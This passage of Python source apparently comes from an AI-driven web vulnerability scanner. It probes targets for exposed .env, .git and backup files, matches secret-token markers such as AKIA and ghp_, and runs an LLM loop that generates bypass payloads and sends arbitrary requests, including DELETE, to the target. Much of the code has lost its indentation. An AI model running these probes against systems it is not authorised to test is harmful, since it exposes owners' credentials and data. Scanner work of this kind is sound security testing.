    Passive inspection of the main target plus up to five discovered
    endpoints. Findings are informational and deduplicated per header kind
    (the `parameter` field acts as the dedup key), so a single finding
    aggregates every affected URL.
    """
    await self.log("info", f" Testing for information disclosure...")
    for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]:
        if not url:
            continue
        try:
            async with self.session.get(url) as resp:
                headers = dict(resp.headers)
                # Server header disclosure (domain-scoped: sensitive_data_exposure)
                server = headers.get("Server", "")
                if server and any(v in server.lower() for v in ["apache/", "nginx/", "iis/", "tomcat/"]):
                    vt = "sensitive_data_exposure"
                    dedup_key = "server_version"  # was a pointless f-string (no placeholders)
                    if self.memory.has_finding_for(vt, url, dedup_key):
                        for ef in self.memory.confirmed_findings:
                            if ef.vulnerability_type == vt and ef.parameter == dedup_key:
                                if url not in ef.affected_urls:
                                    ef.affected_urls.append(url)
                                break
                    else:
                        finding = Finding(
                            id=hashlib.md5(f"server{url}".encode()).hexdigest()[:8],
                            title="Server Version Disclosure",
                            severity="info",
                            vulnerability_type=vt,
                            cvss_score=0.0,
                            cwe_id="CWE-200",
                            description=f"The server discloses its version: {server}",
                            affected_endpoint=url,
                            parameter=dedup_key,
                            evidence=f"Server: {server}",
                            remediation="Remove or obfuscate the Server header to prevent version disclosure.",
                            affected_urls=[url],
                            ai_verified=False  # Detected by inspection
                        )
                        await self._add_finding(finding)
                # X-Powered-By disclosure (domain-scoped: sensitive_data_exposure)
                powered_by = headers.get("X-Powered-By", "")
                if powered_by:
                    vt = "sensitive_data_exposure"
                    dedup_key = "x_powered_by"  # was a pointless f-string (no placeholders)
                    if self.memory.has_finding_for(vt, url, dedup_key):
                        for ef in self.memory.confirmed_findings:
                            if ef.vulnerability_type == vt and ef.parameter == dedup_key:
                                if url not in ef.affected_urls:
                                    ef.affected_urls.append(url)
                                break
                    else:
                        finding = Finding(
                            id=hashlib.md5(f"poweredby{url}".encode()).hexdigest()[:8],
                            title="Technology Version Disclosure",
                            severity="info",
                            vulnerability_type=vt,
                            cvss_score=0.0,
                            cwe_id="CWE-200",
                            description=f"The X-Powered-By header reveals technology: {powered_by}",
                            affected_endpoint=url,
                            parameter=dedup_key,
                            evidence=f"X-Powered-By: {powered_by}",
                            remediation="Remove the X-Powered-By header.",
                            affected_urls=[url],
                            ai_verified=False  # Detected by inspection
                        )
                        await self._add_finding(finding)
        except asyncio.CancelledError:
            # BUGFIX: the original bare `except:` swallowed task cancellation.
            raise
        except Exception:
            pass  # best-effort: unreachable URL or malformed response is non-fatal
async def _test_misconfigurations(self):
    """Probe well-known paths for directory listing, debug mode, exposed
    admin panels and exposed API documentation.

    For each category the first confirmed path yields one finding (dedup via
    AgentMemory), then the category is skipped. Pause/cancel flags are
    honored between categories and between paths.
    """
    await self.log("info", " Testing for misconfigurations...")
    # Common paths to check, grouped by the finding type they indicate.
    check_paths = {
        "directory_listing": ["/", "/assets/", "/images/", "/uploads/", "/static/", "/backup/"],
        "debug_mode": ["/debug", "/debug/", "/_debug", "/trace", "/elmah.axd", "/phpinfo.php"],
        "exposed_admin_panel": ["/admin", "/admin/", "/administrator", "/wp-admin", "/manager", "/dashboard", "/cpanel"],
        "exposed_api_docs": ["/swagger", "/swagger-ui", "/api-docs", "/docs", "/redoc", "/graphql", "/openapi.json"],
    }
    parsed_target = urlparse(self.target)
    base = f"{parsed_target.scheme}://{parsed_target.netloc}"
    for vuln_type, paths in check_paths.items():
        await self._wait_if_paused()
        if self.is_cancelled():
            return
        for path in paths:
            if self.is_cancelled():
                return
            url = base + path
            try:
                async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp:
                    status = resp.status
                    body = await resp.text()
                    # Hoisted: each marker list below compares case-insensitively.
                    lowered = body.lower()
                    detected = False
                    evidence = ""
                    if vuln_type == "directory_listing" and status == 200:
                        # NOTE(review): the third marker was corrupted in the
                        # source (it effectively tested `"\n" in body`, true for
                        # every page — guaranteed false positives). Reconstructed
                        # with the standard Apache autoindex marker; confirm
                        # against VCS history.
                        if ("Index of" in body or "Directory listing" in body
                                or "Parent Directory" in body):
                            detected = True
                            evidence = f"Directory listing enabled at {path}"
                    elif vuln_type == "debug_mode" and status == 200:
                        debug_markers = ["stack trace", "traceback", "debug toolbar",
                                         "phpinfo()", "DJANGO_SETTINGS_MODULE", "laravel_debugbar"]
                        if any(m.lower() in lowered for m in debug_markers):
                            detected = True
                            evidence = f"Debug mode/info exposed at {path}"
                    elif vuln_type == "exposed_admin_panel" and status == 200:
                        # Require two independent markers to cut false positives.
                        admin_markers = ["login", "admin", "password", "sign in", "username"]
                        if sum(1 for m in admin_markers if m.lower() in lowered) >= 2:
                            detected = True
                            evidence = f"Admin panel found at {path}"
                    elif vuln_type == "exposed_api_docs" and status == 200:
                        doc_markers = ["swagger", "openapi", "api documentation", "graphql",
                                       "query {", "mutation {", "paths", "components"]
                        if any(m.lower() in lowered for m in doc_markers):
                            detected = True
                            evidence = f"API documentation exposed at {path}"
                    if detected:
                        if not self.memory.has_finding_for(vuln_type, url, ""):
                            info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
                            finding = Finding(
                                id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
                                title=info.get("title", vuln_type.replace("_", " ").title()),
                                severity=info.get("severity", "low"),
                                vulnerability_type=vuln_type,
                                cvss_score=self._get_cvss_score(vuln_type),
                                cvss_vector=self._get_cvss_vector(vuln_type),
                                cwe_id=info.get("cwe_id", "CWE-16"),
                                description=info.get("description", evidence),
                                affected_endpoint=url,
                                evidence=evidence,
                                remediation=info.get("remediation", "Restrict access to this resource."),
                                affected_urls=[url],
                                ai_verified=False
                            )
                            await self._add_finding(finding)
                            await self.log("warning", f" [FOUND] {vuln_type} at {path}")
                        break  # One finding per vuln type is enough
            except asyncio.CancelledError:
                # BUGFIX: the original bare `except:` swallowed task cancellation.
                raise
            except Exception:
                # A failed probe (timeout, connection error) is non-fatal.
                pass
async def _test_data_exposure(self):
"""Test for source code disclosure, backup files, API key exposure"""
await self.log("info", " Testing for data exposure...")
parsed_target = urlparse(self.target)
base = f"{parsed_target.scheme}://{parsed_target.netloc}"
exposure_checks = {
"source_code_disclosure": {
"paths": ["/.git/HEAD", "/.svn/entries", "/.env", "/wp-config.php.bak",
"/.htaccess", "/web.config", "/config.php~"],
"markers": ["ref:", "svn", "DB_PASSWORD", "APP_KEY", "SECRET_KEY"],
},
"backup_file_exposure": {
"paths": ["/backup.zip", "/backup.sql", "/db.sql", "/site.tar.gz",
"/backup.tar", "/.sql", "/dump.sql"],
"markers": ["PK\x03\x04", "CREATE TABLE", "INSERT INTO", "mysqldump"],
},
"api_key_exposure": {
"paths": ["/config.js", "/env.js", "/settings.json", "/.env.local",
"/api/config", "/static/js/app.*.js"],
"markers": ["api_key", "apikey", "api-key", "secret_key", "access_token",
"AKIA", "sk-", "pk_live_", "ghp_", "glpat-"],
},
}
for vuln_type, config in exposure_checks.items():
await self._wait_if_paused()
if self.is_cancelled():
return
for path in config["paths"]:
if self.is_cancelled():
return
url = base + path
try:
async with self.session.get(url, allow_redirects=False, timeout=self._get_request_timeout()) as resp:
if resp.status == 200:
body = await resp.text()
body_bytes = body[:1000]
if any(m in body_bytes for m in config["markers"]):
if not self.memory.has_finding_for(vuln_type, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vuln_type, {})
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}".encode()).hexdigest()[:8],
title=info.get("title", vuln_type.replace("_", " ").title()),
severity=info.get("severity", "high"),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=info.get("cwe_id", "CWE-200"),
description=f"Sensitive file exposed at {path}",
affected_endpoint=url,
evidence=f"HTTP 200 at {path} with sensitive content markers",
remediation=info.get("remediation", "Remove or restrict access to this file."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] {vuln_type} at {path}")
break
except:
pass
async def _test_ssl_crypto(self):
"""Test for SSL/TLS issues and crypto weaknesses"""
await self.log("info", " Testing SSL/TLS configuration...")
parsed = urlparse(self.target)
# Check if site is HTTP-only (no HTTPS redirect)
if parsed.scheme == "http":
vt = "cleartext_transmission"
if not self.memory.has_finding_for(vt, self.target, ""):
https_url = self.target.replace("http://", "https://")
has_https = False
try:
async with self.session.get(https_url, timeout=5) as resp:
has_https = resp.status < 400
except:
pass
if not has_https:
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{self.target}".encode()).hexdigest()[:8],
title="Cleartext HTTP Transmission",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-319",
description="Application is served over HTTP without HTTPS.",
affected_endpoint=self.target,
evidence="No HTTPS endpoint available",
remediation=info.get("remediation", "Enable HTTPS with a valid TLS certificate."),
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
# Check HSTS header
try:
async with self.session.get(self.target) as resp:
headers = dict(resp.headers)
if "Strict-Transport-Security" not in headers and parsed.scheme == "https":
vt = "ssl_issues"
if not self.memory.has_finding_for(vt, self.target, "hsts"):
finding = Finding(
id=hashlib.md5(f"hsts{self.target}".encode()).hexdigest()[:8],
title="Missing HSTS Header",
severity="low",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cwe_id="CWE-523",
description="Strict-Transport-Security header not set.",
affected_endpoint=self.target,
parameter="hsts",
evidence="HSTS header missing from HTTPS response",
remediation="Add Strict-Transport-Security header with appropriate max-age.",
affected_urls=[self.target],
ai_verified=False
)
await self._add_finding(finding)
except:
pass
async def _test_graphql_introspection(self):
"""Test for GraphQL introspection exposure"""
await self.log("info", " Testing for GraphQL introspection...")
parsed = urlparse(self.target)
base = f"{parsed.scheme}://{parsed.netloc}"
graphql_paths = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
introspection_query = '{"query":"{__schema{types{name}}}"}'
for path in graphql_paths:
url = base + path
try:
async with self.session.post(
url,
data=introspection_query,
headers={"Content-Type": "application/json"},
) as resp:
if resp.status == 200:
body = await resp.text()
if "__schema" in body or "queryType" in body:
vt = "graphql_introspection"
if not self.memory.has_finding_for(vt, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8],
title="GraphQL Introspection Enabled",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-200",
description=info.get("description", "GraphQL introspection is enabled, exposing the full API schema."),
affected_endpoint=url,
evidence="__schema data returned from introspection query",
remediation=info.get("remediation", "Disable introspection in production."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] GraphQL introspection at {path}")
return
except:
pass
async def _test_csrf_inspection(self):
"""Test for CSRF protection on forms"""
await self.log("info", " Testing for CSRF protection...")
for form in self.recon.forms[:10]:
if form.get("method", "GET").upper() != "POST":
continue
action = form.get("action", "")
inputs = form.get("inputs", [])
# Check if form has CSRF token
csrf_names = {"csrf", "_token", "csrfmiddlewaretoken", "authenticity_token",
"__RequestVerificationToken", "_csrf", "csrf_token"}
has_token = any(
inp.lower() in csrf_names
for inp in inputs
if isinstance(inp, str)
)
if not has_token and action:
vt = "csrf"
if not self.memory.has_finding_for(vt, action, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{action}".encode()).hexdigest()[:8],
title="Missing CSRF Protection",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-352",
description=f"POST form at {action} lacks CSRF token protection.",
affected_endpoint=action,
evidence=f"No CSRF token found in form fields: {inputs[:5]}",
remediation=info.get("remediation", "Implement CSRF tokens for all state-changing requests."),
affected_urls=[action],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] Missing CSRF protection at {action[:50]}")
async def _ai_dynamic_test(self, user_prompt: str):
"""
AI-driven dynamic vulnerability testing - can test ANY vulnerability type.
The LLM generates payloads, test strategies, and analyzes results dynamically.
Examples of what this can test:
- XXE (XML External Entity)
- Race Conditions
- Rate Limiting Bypass
- WAF Bypass
- CSP Bypass
- BFLA (Broken Function Level Authorization)
- BOLA (Broken Object Level Authorization)
- JWT vulnerabilities
- GraphQL injection
- NoSQL injection
- Prototype pollution
- And ANY other vulnerability type!
"""
await self.log("info", f"[AI DYNAMIC TEST] Processing: {user_prompt}")
if not self.llm.is_available():
await self.log("warning", " LLM not available - attempting basic tests based on prompt")
await self._ai_test_fallback(user_prompt)
return
# Gather reconnaissance context
endpoints_info = []
for ep in self.recon.endpoints[:15]:
url = _get_endpoint_url(ep)
method = _get_endpoint_method(ep)
if url:
endpoints_info.append({"url": url, "method": method})
forms_info = []
for form in self.recon.forms[:5]:
if isinstance(form, dict):
forms_info.append({
"action": form.get("action", ""),
"method": form.get("method", "GET"),
"inputs": form.get("inputs", [])[:5]
})
context = f"""
TARGET: {self.target}
TECHNOLOGIES: {', '.join(self.recon.technologies) if self.recon.technologies else 'Unknown'}
ENDPOINTS ({len(endpoints_info)} found):
{json.dumps(endpoints_info[:10], indent=2)}
FORMS ({len(forms_info)} found):
{json.dumps(forms_info, indent=2)}
PARAMETERS DISCOVERED: {list(self.recon.parameters.keys())[:20]}
"""
# RAG: Get testing context for the vulnerability type
rag_dynamic_ctx = self._get_rag_testing_context(user_prompt) if (self.rag_engine or self.few_shot_selector) else ""
# Playbook: Get methodology for this vuln type if identifiable
playbook_dynamic_ctx = ""
if HAS_PLAYBOOK:
try:
# Try to match user_prompt to a known vuln type
prompt_lower = user_prompt.lower().replace(" ", "_").replace("-", "_")
entry = get_playbook_entry(prompt_lower)
if not entry:
# Fuzzy match: try common substrings
for vtype in ["xss", "sqli", "ssrf", "idor", "csrf", "xxe", "ssti",
"lfi", "rfi", "rce", "command_injection", "open_redirect"]:
if vtype in prompt_lower:
entry = get_playbook_entry(vtype) or get_playbook_entry(f"{vtype}_reflected")
if entry:
prompt_lower = vtype
break
if entry:
prompts = get_testing_prompts(prompt_lower)
bypass = get_bypass_strategies(prompt_lower)
playbook_dynamic_ctx = f"\n--- PLAYBOOK METHODOLOGY for {entry.get('title', prompt_lower)} ---\n"
playbook_dynamic_ctx += f"Overview: {entry.get('overview', '')}\n"
playbook_dynamic_ctx += f"Threat Model: {entry.get('threat_model', '')}\n"
if prompts:
playbook_dynamic_ctx += f"Key Testing Prompts:\n"
for p in prompts[:5]:
playbook_dynamic_ctx += f" - {p}\n"
if bypass:
playbook_dynamic_ctx += f"Bypass Strategies: {', '.join(bypass[:5])}\n"
except Exception:
pass
# Phase 1: Ask AI to understand the vulnerability and create test strategy
strategy_prompt = f"""You are an expert penetration tester. The user wants to test for:
"{user_prompt}"
Based on the target information below, create a comprehensive testing strategy.
{context}
{rag_dynamic_ctx}{playbook_dynamic_ctx}
Respond in JSON format with:
{{
"vulnerability_type": "name of the vulnerability being tested",
"cwe_id": "CWE-XXX if applicable",
"owasp_category": "OWASP category if applicable",
"description": "Brief description of what this vulnerability is",
"severity_if_found": "critical|high|medium|low",
"cvss_estimate": 0.0-10.0,
"test_cases": [
{{
"name": "Test case name",
"technique": "Technique being used",
"url": "URL to test (use actual URLs from context)",
"method": "GET|POST|PUT|DELETE",
"headers": {{"Header-Name": "value"}},
"body": "request body if POST/PUT",
"content_type": "application/json|application/xml|application/x-www-form-urlencoded",
"success_indicators": ["what to look for in response that indicates vulnerability"],
"failure_indicators": ["what indicates NOT vulnerable"]
}}
],
"payloads": ["list of specific payloads to try"],
"analysis_tips": "What patterns or behaviors indicate this vulnerability"
}}
Generate at least 3-5 realistic test cases using the actual endpoints from the context.
Be creative and thorough - think like a real penetration tester."""
await self.log("info", " Phase 1: AI generating test strategy...")
try:
strategy_response = await self.llm.generate(
strategy_prompt,
self._get_enhanced_system_prompt("strategy")
)
# Extract JSON from response
match = re.search(r'\{[\s\S]*\}', strategy_response)
if not match:
await self.log("warning", " AI did not return valid JSON strategy, using fallback")
await self._ai_test_fallback(user_prompt)
return
strategy = json.loads(match.group())
vuln_type = strategy.get("vulnerability_type", user_prompt)
cwe_id = strategy.get("cwe_id", "")
severity = strategy.get("severity_if_found", "medium")
cvss = strategy.get("cvss_estimate", 5.0)
description = strategy.get("description", f"Testing for {vuln_type}")
await self.log("info", f" Vulnerability: {vuln_type}")
await self.log("info", f" CWE: {cwe_id} | Severity: {severity} | CVSS: {cvss}")
await self.log("info", f" Test cases: {len(strategy.get('test_cases', []))}")
# Phase 2: Execute test cases
await self.log("info", " Phase 2: Executing AI-generated test cases...")
test_results = []
for i, test_case in enumerate(strategy.get("test_cases", [])[:10]):
test_name = test_case.get("name", f"Test {i+1}")
await self.log("debug", f" Running: {test_name}")
result = await self._execute_ai_dynamic_test(test_case)
if result:
result["test_name"] = test_name
result["success_indicators"] = test_case.get("success_indicators", [])
result["failure_indicators"] = test_case.get("failure_indicators", [])
test_results.append(result)
# Phase 3: AI analysis of results
await self.log("info", " Phase 3: AI analyzing results...")
analysis_prompt = f"""Analyze these test results for {vuln_type} vulnerability.
VULNERABILITY BEING TESTED: {vuln_type}
{description}
ANALYSIS TIPS: {strategy.get('analysis_tips', 'Look for error messages, unexpected behavior, or data leakage')}
TEST RESULTS:
{json.dumps(test_results[:5], indent=2, default=str)[:8000]}
For each test result, analyze if it indicates a vulnerability.
Consider:
- Success indicators: {strategy.get('test_cases', [{}])[0].get('success_indicators', [])}
- Response status codes, error messages, timing differences, data in response
Respond in JSON:
{{
"findings": [
{{
"is_vulnerable": true|false,
"confidence": "high|medium|low",
"test_name": "which test",
"evidence": "specific evidence from response",
"explanation": "why this indicates vulnerability"
}}
],
"overall_assessment": "summary of findings",
"recommendations": ["list of remediation steps"]
}}"""
analysis_response = await self.llm.generate(
analysis_prompt,
self._get_enhanced_system_prompt("confirmation")
)
# Parse analysis
analysis_match = re.search(r'\{[\s\S]*\}', analysis_response)
if analysis_match:
analysis = json.loads(analysis_match.group())
for finding_data in analysis.get("findings", []):
if finding_data.get("is_vulnerable") and finding_data.get("confidence") in ["high", "medium"]:
evidence = finding_data.get("evidence", "")
test_name = finding_data.get("test_name", "AI Test")
# Find the matching test result for endpoint + body
affected_endpoint = self.target
matched_body = ""
for tr in test_results:
if tr.get("test_name") == test_name:
affected_endpoint = tr.get("url", self.target)
matched_body = tr.get("body", "")
break
# Anti-hallucination: verify AI evidence in actual response
if evidence and matched_body:
if not self._evidence_in_response(evidence, matched_body):
await self.log("debug", f" [REJECTED] AI claimed evidence not found in response for {test_name}")
self.memory.reject_finding(
type("F", (), {"vulnerability_type": vuln_type, "affected_endpoint": affected_endpoint, "parameter": ""})(),
f"AI evidence not grounded in HTTP response: {evidence[:100]}"
)
continue
# Get metadata from registry if available
mapped = self._map_vuln_type(vuln_type.lower().replace(" ", "_"))
reg_title = self.vuln_registry.get_title(mapped)
reg_cwe = self.vuln_registry.get_cwe_id(mapped)
reg_remediation = self.vuln_registry.get_remediation(mapped)
finding = Finding(
id=hashlib.md5(f"{vuln_type}{affected_endpoint}{test_name}".encode()).hexdigest()[:8],
title=reg_title or f"{vuln_type}",
severity=severity,
vulnerability_type=vuln_type.lower().replace(" ", "_"),
cvss_score=float(cvss) if cvss else 5.0,
cvss_vector=self._get_cvss_vector(vuln_type.lower().replace(" ", "_")),
cwe_id=reg_cwe or cwe_id or "",
description=f"{description}\n\nAI Explanation: {finding_data.get('explanation', '')}",
affected_endpoint=affected_endpoint,
evidence=evidence[:1000],
remediation=reg_remediation or "\n".join(analysis.get("recommendations", [])),
ai_verified=True
)
await self._add_finding(finding)
await self.log("warning", f" [AI FOUND] {vuln_type} - {finding_data.get('confidence')} confidence")
await self.log("info", f" Assessment: {analysis.get('overall_assessment', 'Analysis complete')[:100]}")
except json.JSONDecodeError as e:
await self.log("warning", f" JSON parse error: {e}")
await self._ai_test_fallback(user_prompt)
except Exception as e:
await self.log("error", f" AI dynamic test error: {e}")
await self._ai_test_fallback(user_prompt)
async def _execute_ai_dynamic_test(self, test_case: Dict) -> Optional[Dict]:
"""Execute a single AI-generated test case"""
if not self.session:
return None
try:
url = test_case.get("url", self.target)
method = test_case.get("method", "GET").upper()
headers = test_case.get("headers", {})
body = test_case.get("body", "")
content_type = test_case.get("content_type", "")
if content_type and "Content-Type" not in headers:
headers["Content-Type"] = content_type
start_time = asyncio.get_event_loop().time()
if method == "GET":
async with self.session.get(url, headers=headers, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method == "POST":
if content_type == "application/json" and isinstance(body, str):
try:
body = json.loads(body)
except:
pass
async with self.session.post(url, headers=headers, data=body if isinstance(body, str) else None, json=body if isinstance(body, dict) else None, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method in ["PUT", "DELETE", "PATCH"]:
request_method = getattr(self.session, method.lower())
async with request_method(url, headers=headers, data=body, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
except Exception as e:
return {
"url": url,
"method": method,
"error": str(e),
"status": 0
}
return None
# ── AI Deep Test: Iterative Human-Pentester Loop ─────────────────────
MAX_DEEP_TEST_ITERATIONS = 3
    async def _ai_deep_test(
        self,
        url: str,
        vuln_type: str,
        params: List[str],
        method: str = "GET",
        form_defaults: Optional[Dict] = None,
    ) -> Optional[Finding]:
        """AI-driven iterative testing loop — the core of LLM-as-VulnEngine.
        Unlike hardcoded payload iteration, this method:
        1. OBSERVES — builds rich context (baseline, tech, WAF, playbook, memory)
        2. PLANS — asks LLM to generate targeted test cases
        3. EXECUTES — sends requests, captures full responses
        4. ANALYZES — LLM reviews actual responses with anti-hallucination
        5. ADAPTS — if promising signals found, loops with refined tests
        All confirmed findings go through _judge_finding() (ValidationJudge pipeline).
        Returns the first confirmed Finding, or None.
        """
        # Preconditions: working LLM + HTTP session, and scan not cancelled.
        if not self.llm.is_available() or not self.session:
            return None
        if self.is_cancelled():
            return None
        # Token budget check — skip if budget exhausted
        if self.token_budget and hasattr(self.token_budget, 'should_skip'):
            if self.token_budget.should_skip("deep_test"):
                return None
        await self.log("debug", f" [AI-DEEP] {vuln_type} on {url[:60]}...")
        # Step 1: OBSERVE — Build rich context
        context = self._build_deep_test_context(
            url, vuln_type, params, method, form_defaults
        )
        # Playbook context (best-effort; any failure leaves it empty)
        playbook_ctx = ""
        if HAS_PLAYBOOK:
            try:
                entry = get_playbook_entry(vuln_type)
                if entry:
                    prompts = get_testing_prompts(vuln_type)
                    bypass = get_bypass_strategies(vuln_type)
                    anti_fp = get_anti_fp_rules(vuln_type)
                    playbook_ctx = f"\n## PLAYBOOK METHODOLOGY for {vuln_type}\n"
                    playbook_ctx += f"Overview: {entry.get('overview', '')}\n"
                    if prompts:
                        playbook_ctx += "Testing prompts:\n"
                        for p in prompts[:5]:
                            playbook_ctx += f" - {p}\n"
                    if bypass:
                        playbook_ctx += f"Bypass strategies: {', '.join(bypass[:5])}\n"
                    if anti_fp:
                        playbook_ctx += f"Anti-FP rules: {', '.join(anti_fp[:3])}\n"
            except Exception:
                pass
        # Import the prompt builders (local import; bail out if unavailable)
        try:
            from backend.core.vuln_engine.ai_prompts import (
                get_deep_test_plan_prompt, get_deep_test_analysis_prompt
            )
        except ImportError:
            return None
        previous_results_json = ""
        all_test_results = []
        for iteration in range(1, self.MAX_DEEP_TEST_ITERATIONS + 1):
            if self.is_cancelled():
                return None
            # Step 2: PLAN — AI generates targeted test cases
            plan_prompt = get_deep_test_plan_prompt(
                vuln_type=vuln_type,
                context=context,
                playbook_ctx=playbook_ctx,
                iteration=iteration,
                previous_results=previous_results_json,
            )
            try:
                plan_response = await self.llm.generate(
                    plan_prompt,
                    self._get_enhanced_system_prompt("deep_testing", vuln_type)
                )
            except Exception as e:
                await self.log("debug", f" [AI-DEEP] Plan error round {iteration}: {e}")
                break
            # Parse plan JSON (widest {...} span in the LLM output)
            plan_match = re.search(r'\{[\s\S]*\}', plan_response)
            if not plan_match:
                await self.log("debug", f" [AI-DEEP] No JSON in plan response round {iteration}")
                break
            try:
                plan = json.loads(plan_match.group())
            except json.JSONDecodeError:
                await self.log("debug", f" [AI-DEEP] JSON parse error round {iteration}")
                break
            tests = plan.get("tests", [])
            if not tests:
                await self.log("debug", f" [AI-DEEP] No tests generated round {iteration}")
                break
            reasoning = plan.get("reasoning", "")
            if reasoning and iteration == 1:
                await self.log("info", f" [AI-DEEP] Strategy: {reasoning[:120]}")
            # Step 3: EXECUTE — Send requests, capture full responses
            round_results = await self._execute_ai_planned_tests(tests, url, method)
            all_test_results.extend(round_results)
            if not round_results:
                break
            # Build baseline string for analysis (empty if no baseline stored)
            baseline_str = ""
            baseline_resp = self.memory.get_baseline(url)
            if baseline_resp:
                baseline_str = (
                    f"Status: {baseline_resp.get('status', '?')}\n"
                    f"Headers: {json.dumps(dict(list(baseline_resp.get('headers', {}).items())[:10]), default=str)}\n"
                    f"Body preview: {baseline_resp.get('body', '')[:500]}\n"
                    f"Body length: {len(baseline_resp.get('body', ''))}"
                )
            # Step 4: ANALYZE — AI reviews actual responses
            results_json = json.dumps(round_results[:5], indent=2, default=str)[:6000]
            analysis_prompt = get_deep_test_analysis_prompt(
                vuln_type=vuln_type,
                test_results=results_json,
                baseline=baseline_str,
                iteration=iteration,
            )
            try:
                analysis_response = await self.llm.generate(
                    analysis_prompt,
                    self._get_enhanced_system_prompt("confirmation", vuln_type)
                )
            except Exception as e:
                await self.log("debug", f" [AI-DEEP] Analysis error round {iteration}: {e}")
                break
            # Parse analysis JSON
            analysis_match = re.search(r'\{[\s\S]*\}', analysis_response)
            if not analysis_match:
                break
            try:
                analysis = json.loads(analysis_match.group())
            except json.JSONDecodeError:
                break
            # Step 5: Check for confirmed findings
            for finding_data in analysis.get("analysis", []):
                if not finding_data.get("is_vulnerable"):
                    continue
                if finding_data.get("confidence") not in ("high", "medium"):
                    continue
                evidence = finding_data.get("evidence", "")
                test_name = finding_data.get("test_name", "AI Deep Test")
                # Find matching test result for endpoint + response
                affected_endpoint = url
                matched_body = ""
                matched_resp = None
                for tr in all_test_results:
                    if tr.get("test_name") == test_name or tr.get("name") == test_name:
                        affected_endpoint = tr.get("url", url)
                        matched_body = tr.get("body_preview", "")
                        matched_resp = tr
                        break
                # Anti-hallucination: verify evidence exists in actual response
                if evidence and matched_body:
                    if not self._evidence_in_response(evidence, matched_body):
                        await self.log("debug",
                            f" [AI-DEEP] REJECTED: evidence not grounded in response for {test_name}")
                        # Throwaway attribute bag mimicking a Finding for rejection bookkeeping
                        self.memory.reject_finding(
                            type("F", (), {
                                "vulnerability_type": vuln_type,
                                "affected_endpoint": affected_endpoint,
                                "parameter": ""
                            })(),
                            f"AI evidence not in response: {evidence[:100]}"
                        )
                        continue
                # Extract payload from matching test
                payload = ""
                param_name = ""
                if matched_resp:
                    payload = matched_resp.get("payload", "")
                    param_name = matched_resp.get("param", params[0] if params else "")
                # Run through ValidationJudge pipeline
                finding = await self._judge_finding(
                    vuln_type, affected_endpoint, param_name or (params[0] if params else ""),
                    payload, evidence, matched_resp or {},
                    baseline=baseline_resp
                )
                if finding:
                    await self.log("warning",
                        f" [AI-DEEP] CONFIRMED {vuln_type} round {iteration}: "
                        f"{finding_data.get('confidence')} confidence")
                    return finding
            # Step 6: ADAPT — decide whether to continue
            if not analysis.get("continue_testing", False):
                await self.log("debug",
                    f" [AI-DEEP] {vuln_type}: done after round {iteration} "
                    f"({analysis.get('summary', 'no findings')})")
                break
            # Prepare previous results for next iteration
            previous_results_json = results_json
            next_strategy = analysis.get("next_round_strategy", "")
            if next_strategy:
                await self.log("debug", f" [AI-DEEP] Round {iteration + 1} strategy: {next_strategy[:80]}")
        return None
def _build_deep_test_context(
self,
url: str,
vuln_type: str,
params: List[str],
method: str,
form_defaults: Dict = None,
) -> str:
"""Build rich observation context for the AI deep test loop.
Combines: endpoint details, baseline, tech stack, WAF info,
parameter analysis, and memory of previous tests.
"""
parsed = urlparse(url)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Endpoint details
parts = [
f"TARGET URL: {url}",
f"BASE URL: {base_url}",
f"METHOD: {method}",
f"PARAMETERS: {', '.join(params[:10]) if params else 'none discovered'}",
]
if form_defaults:
parts.append(f"FORM DEFAULTS: {json.dumps(form_defaults, default=str)[:300]}")
# Technology stack
if self.recon.technologies:
parts.append(f"TECHNOLOGIES: {', '.join(self.recon.technologies[:10])}")
# Baseline response
baseline = self.memory.get_baseline(url) or self.memory.get_baseline(base_url)
if baseline:
parts.append(f"\nBASELINE RESPONSE:")
parts.append(f" Status: {baseline.get('status', '?')}")
parts.append(f" Content-Type: {baseline.get('content_type', '?')}")
parts.append(f" Body length: {len(baseline.get('body', ''))}")
body_preview = baseline.get('body', '')[:300]
if body_preview:
parts.append(f" Body preview: {body_preview}")
